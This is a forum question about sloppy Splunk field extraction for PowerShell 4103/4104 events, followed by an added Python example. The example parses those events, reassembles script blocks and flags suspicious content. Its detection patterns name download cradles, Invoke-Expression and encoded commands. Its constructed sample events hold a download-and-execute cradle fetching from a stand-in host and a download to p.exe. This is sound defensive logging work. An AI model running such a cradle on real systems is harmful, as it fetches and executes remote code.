This was VERY helpful - thanks!! I'm finding that the data Splunk ingests for PowerShell events (i.e. 4103, 4104) is very sloppy. Fields are not getting extracted, etc. Any idea on how I can resolve this? There doesn't seem to be a proper "Splunk_TA_PowerShell" with props.conf & transforms.conf to clean up the PowerShell event data - am I wrong? Let me know if you know of a solution, or good resource. Thanks!
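The field extraction the post above is asking about, as an added example that is not part of the original thread and not Splunk's or any TA's code. It parses the message body of Script Block Logging (4104) and Module Logging (4103) events with the same kind of regex a `props.conf` `EXTRACT-` setting would use, reassembles multi-chunk 4104 script blocks by ScriptBlock ID, and runs a few simple content checks over the rebuilt script. The event bodies, GUIDs, paths and user names are constructed for illustration; the suspicious-content patterns are an assumed starting list, not a complete detection ruleset.

```python
"""Field extraction and reassembly for PowerShell 4104 and 4103 event text.
Mirrors what a props.conf EXTRACT- regex would do in Splunk. Every sample
event below is constructed for illustration, not captured from a real host."""
import re
from collections import defaultdict

# 4104 message body layout (Microsoft-Windows-PowerShell/Operational channel):
#   Creating Scriptblock text (N of M):
#   <script text, possibly spanning many lines>
#   ScriptBlock ID: <guid>
#   Path: <script path; empty for interactive or in-memory code>
RE_4104 = re.compile(
    r"Creating Scriptblock text \((?P<part>\d+) of (?P<total>\d+)\):\s*"
    r"(?P<ScriptBlockText>.*?)\s*"
    r"ScriptBlock ID:\s*(?P<ScriptBlockId>[0-9a-fA-F-]{36})\s*"
    r"Path:\s*(?P<Path>[^\r\n]*)",
    re.DOTALL,
)

# 4103 message body: CommandInvocation/ParameterBinding lines, then a
# "Context:" block of "Key = Value" pairs.
RE_4103_INVOKE = re.compile(r"CommandInvocation\((?P<Command>[^)]+)\):")
RE_4103_PARAM = re.compile(
    r'ParameterBinding\([^)]+\): name="(?P<name>[^"]*)"; value="(?P<value>[^"]*)"'
)
RE_4103_CONTEXT = re.compile(r"^\s*(?P<key>[A-Za-z ]+?) = (?P<value>.*)$", re.MULTILINE)

# Assumed starter list of script-content checks; tune for your environment.
SUSPICIOUS = [
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("base64_decode", re.compile(r"FromBase64String", re.I)),
    ("download_cradle", re.compile(r"Net\.WebClient|DownloadString|Invoke-WebRequest|\bIWR\b", re.I)),
    ("iex", re.compile(r"Invoke-Expression|\bIEX\b", re.I)),
]


def extract_4104(message):
    """Return the named fields from one 4104 message body, or None if it does not match."""
    m = RE_4104.search(message)
    if not m:
        return None
    fields = m.groupdict()
    fields["part"] = int(fields["part"])
    fields["total"] = int(fields["total"])
    return fields


def reassemble_script_blocks(messages):
    """Group 4104 chunks by ScriptBlock ID and join them in part order.
    Long scripts are logged as several events sharing one ID; detection on a
    single chunk can miss what only the whole block reveals."""
    chunks = defaultdict(dict)
    meta = {}
    for msg in messages:
        f = extract_4104(msg)
        if f is None:
            continue
        chunks[f["ScriptBlockId"]][f["part"]] = f["ScriptBlockText"]
        meta[f["ScriptBlockId"]] = (f["total"], f["Path"])
    result = {}
    for sbid, parts in chunks.items():
        total, path = meta[sbid]
        complete = set(parts) == set(range(1, total + 1))
        text = "".join(parts[i] for i in sorted(parts))
        result[sbid] = {"text": text, "path": path, "complete": complete}
    return result


def extract_4103(message):
    """Return the invoked command, its bound parameters and the Context key/value pairs."""
    inv = RE_4103_INVOKE.search(message)
    params = {m.group("name"): m.group("value") for m in RE_4103_PARAM.finditer(message)}
    ctx_text = message.split("Context:", 1)[1] if "Context:" in message else ""
    context = {m.group("key").strip(): m.group("value").strip()
               for m in RE_4103_CONTEXT.finditer(ctx_text)}
    return {"Command": inv.group("Command") if inv else None,
            "Parameters": params, "Context": context}


def flag_script(text):
    """Names of the SUSPICIOUS patterns that match the (reassembled) script text."""
    return sorted(name for name, rx in SUSPICIOUS if rx.search(text))


# Constructed sample events: a two-chunk download cradle and a benign one-chunk script.
SAMPLE_4104 = [
    "Creating Scriptblock text (1 of 2):\n$c = New-Object Net.WebClient; "
    "$s = $c.DownloadString('http://example.invalid/p');\n\n"
    "ScriptBlock ID: 6d0b1f2a-3c4d-4e5f-8a9b-0c1d2e3f4a5b\nPath: ",
    "Creating Scriptblock text (2 of 2):\nInvoke-Expression $s\n\n"
    "ScriptBlock ID: 6d0b1f2a-3c4d-4e5f-8a9b-0c1d2e3f4a5b\nPath: ",
    "Creating Scriptblock text (1 of 1):\nGet-ChildItem C:\\Users\n\n"
    "ScriptBlock ID: 11111111-2222-4333-8444-555555555555\nPath: C:\\ops\\inventory.ps1",
]
SAMPLE_4103 = (
    'CommandInvocation(Invoke-WebRequest): "Invoke-WebRequest"\n'
    'ParameterBinding(Invoke-WebRequest): name="Uri"; value="http://example.invalid/p"\n'
    'ParameterBinding(Invoke-WebRequest): name="OutFile"; value="C:\\Users\\Public\\p.exe"\n'
    "\n\nContext:\n"
    "        Severity = Informational\n"
    "        Host Name = ConsoleHost\n"
    "        Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n"
    "        Command Name = Invoke-WebRequest\n"
    "        User = CORP\\alice\n"
    "        Script Name = \n"
    "\n\nUser Data:\n"
)

if __name__ == "__main__":
    for sbid, sb in reassemble_script_blocks(SAMPLE_4104).items():
        print(sbid, "complete" if sb["complete"] else "PARTIAL",
              sb["path"] or "<in-memory>", flag_script(sb["text"]))
    print(extract_4103(SAMPLE_4103))
```

To move the 4104 extraction into Splunk, the same regex goes in an `EXTRACT-<name>` setting in `props.conf` under the sourcetype that carries the PowerShell Operational channel; Splunk's PCRE uses `(?<name>...)` for named groups rather than Python's `(?P<name>...)`, and the `re.DOTALL` flag becomes an inline `(?s)`. Before writing any regex, check which rendering the input is using: if the channel is collected with `renderXml=true`, the script text, ID, path and message-number fields already arrive as named `Data` elements inside `EventData`, and extraction is a matter of naming them rather than parsing the free-text message.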